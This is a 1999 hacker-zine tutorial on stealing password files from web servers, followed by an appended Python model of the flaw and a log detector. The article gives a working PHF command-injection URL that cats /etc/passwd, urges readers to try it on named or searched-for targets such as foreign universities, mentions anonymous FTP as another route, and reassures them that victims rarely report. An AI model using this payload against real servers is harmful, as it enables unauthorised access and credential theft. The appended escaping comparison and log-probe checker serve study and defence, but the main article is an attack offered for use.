SWAT MAGAZINE ISSUE FOURTEEN: FEBRUARY 1999
============================================
Getting The Password File
============================================
Author : Netw0rk Bug
E-Mail : bug@netw0rk.freeserve.co.uk
Date   : February 1998
============================================

I get asked how to get the passwd file all the time, so I decided to write
up this little file to teach some of the newbies the basics. You should all
by now know how to crack a passwd file. If not, go ahead and download the
tutorial from my site. What we need to learn now is ways of getting the
passwd file off the server that you want to hack.

The passwd file is nearly always at /etc/passwd. It is world-readable, so
any way of reading a file or running a command as the web or FTP server's
user is enough to fetch it. (If the box uses shadow passwords the hash field
in /etc/passwd is just an "x" or "*" and the real hashes are in /etc/shadow,
which is not world-readable; cracking that copy gets you nothing.)

There are a few different ways to get a password file. You can:

a.) Use the PHF exploit.
b.) Telnet to port 21 (the FTP control port) on the provider and talk FTP by
    hand. When using TELNET type:
        USER anonymous
    followed by PASS with any e-mail address. Bear in mind that the file
    itself comes back over a separate data connection, and that what sits in
    the anonymous FTP area is usually a trimmed-down copy of /etc/passwd with
    no real hashes in it.
c.) Use an FTP program that does all the commands for you.

What we are going to do is take a look at the PHF exploit. First let me
explain what an exploit is. An exploit is a way of using a hole in software
to get something out of it that... well, you aren't supposed to. (The hole
itself is the vulnerability; the exploit is the trick that uses it.)

The PHF hole is in phf, a phone-book lookup CGI script that shipped as
example code with the NCSA httpd and early Apache servers. phf handed the
alias you typed to the system shell. It backslash-escaped most shell special
characters first, but it forgot the newline, so a newline in the query ends
the phone-book command and whatever follows it runs as a second command,
with the web server's privileges. Most servers have fixed this by now (or
never installed phf in the first place). Let's just say a very popular IRC
place has a problem with their CGI. Also on the subject of servers with the
exploit open, many foreign servers still have it.

Unlike the FTP passwd you don't even have to access their FTP or log in.
What you do is get a WWW browser and in the place for the WWW address type:

    http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

%0a is the URL-encoded newline that splits the command and %20 is a space.
Use the full path /bin/cat, because the PATH a CGI runs with may be very
short.

In place of www.target.com put whoever's passwd you want to get. So if you
were going to try cyberspace.org you would put:

    http://cyberspace.org/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

If you get a message like "The requested object does not exist on this
server. The link you followed is either outdated, inaccurate, or the server
has been instructed not to let you have it." it's not there.

If you get "You have been caught on Candid Camera!" they caught you: the
real phf has been replaced with a decoy that logs the attempt. But don't
fear, they rarely ever report you. I have yet to find a server that does
report.

Of course if you get "root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh"
then you have hit the jackpot.

This is by far the easiest method of getting the passwd file. It usually
works best on foreign universities. Search for some in a search engine.

cya later
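As an added illustration that is not part of the original article, here is a small Python model of why the phf trick works and how either side can check for it. It decodes the Qalias parameter the way the CGI did, shows the command line that the original escaping hands to the shell next to what a fixed escaping hands it, sorts a phf response into the outcomes described above, and flags phf requests in a constructed access log. The set of escaped characters, the path of the ph binary and the log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Shell metacharacters the server's escape_shell_cmd() backslash-escaped
# before the alias reached popen().  The exact set is an assumption; what is
# documented, and what the bug is, is that newline was NOT in it.
SHELL_META_ESCAPED = set('&;`\'"|*?~<>^()[]{}$\\')

# Assumed install path of the ph (CSO phone book) client that phf ran.
PH_BINARY = "/usr/local/bin/ph"

EXPLOIT_URL = "http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd"


def escape_shell_cmd_vulnerable(s):
    """Model of the original escaping: newline passes through untouched."""
    return "".join("\\" + c if c in SHELL_META_ESCAPED else c for c in s)


def escape_shell_cmd_fixed(s):
    """Hardened variant: newline and carriage return are escaped as well."""
    return "".join("\\" + c if (c in SHELL_META_ESCAPED or c in "\n\r") else c
                   for c in s)


def build_popen_line(url, escape):
    """Decode Qalias as a CGI would and build the popen() command line."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)  # %-decodes
    alias = qs.get("Qalias", [""])[0]
    return "%s -m alias=%s" % (PH_BINARY, escape(alias))


def shell_commands(cmdline):
    """Split a command line into the separate commands sh would run.

    An unescaped newline separates commands, backslash-newline is a line
    continuation and vanishes, backslash-X yields the literal X.
    """
    cmds, cur, i = [], "", 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == "\\" and i + 1 < len(cmdline):
            if cmdline[i + 1] != "\n":
                cur += cmdline[i + 1]
            i += 2
            continue
        if c == "\n":
            if cur.strip():
                cmds.append(cur.strip())
            cur = ""
        else:
            cur += c
        i += 1
    if cur.strip():
        cmds.append(cur.strip())
    return cmds


# One passwd(5) record: name:hash:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(r"^[^:\s]+:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:\s]*$", re.M)


def classify_response(body):
    """Sort a phf response body into the cases the article describes."""
    if "Candid Camera" in body:
        return "decoy"        # a fake phf that logs the attempt
    if PASSWD_LINE.search(body):
        return "jackpot"      # the injected cat ran and its output came back
    if "does not exist on this server" in body:
        return "not-found"    # no phf on this host
    return "unknown"


# Common Log Format: client ident user [time] "METHOD target PROTO" ...
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|HEAD|POST) (\S+) [^"]*"')


def phf_probes(log_text):
    """Return (client, severity) for every request to /cgi-bin/phf.

    'injection' when the decoded query carries a newline, 'lookup' otherwise.
    """
    hits = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(2)
        path, _, query = target.partition("?")
        if not path.endswith("/cgi-bin/phf"):
            continue
        decoded = unquote(query)
        severity = "injection" if ("\n" in decoded or "\r" in decoded) else "lookup"
        hits.append((client, severity))
    return hits


# Constructed sample access log: one injection, one plain page, one
# legitimate phone-book lookup.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Feb/1999:03:12:44 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1187
10.0.0.8 - - [10/Feb/1999:03:13:01 +0000] "GET /index.html HTTP/1.0" 200 2048
10.0.0.9 - - [10/Feb/1999:03:14:10 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 312
"""

if __name__ == "__main__":
    for name, esc in (("vulnerable", escape_shell_cmd_vulnerable),
                      ("fixed", escape_shell_cmd_fixed)):
        print(name, "->", shell_commands(build_popen_line(EXPLOIT_URL, esc)))
    print(classify_response("root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh\n"))
    print(phf_probes(SAMPLE_LOG))
```

Run as-is, the vulnerable path yields two commands, the second being /bin/cat /etc/passwd, while the fixed escaping turns the backslash-newline into a line continuation and the whole query becomes one harmless (if nonsensical) alias argument. On the defending side, phf_probes is the same check an IDS signature of the day made: a request to /cgi-bin/phf whose query decodes to a newline.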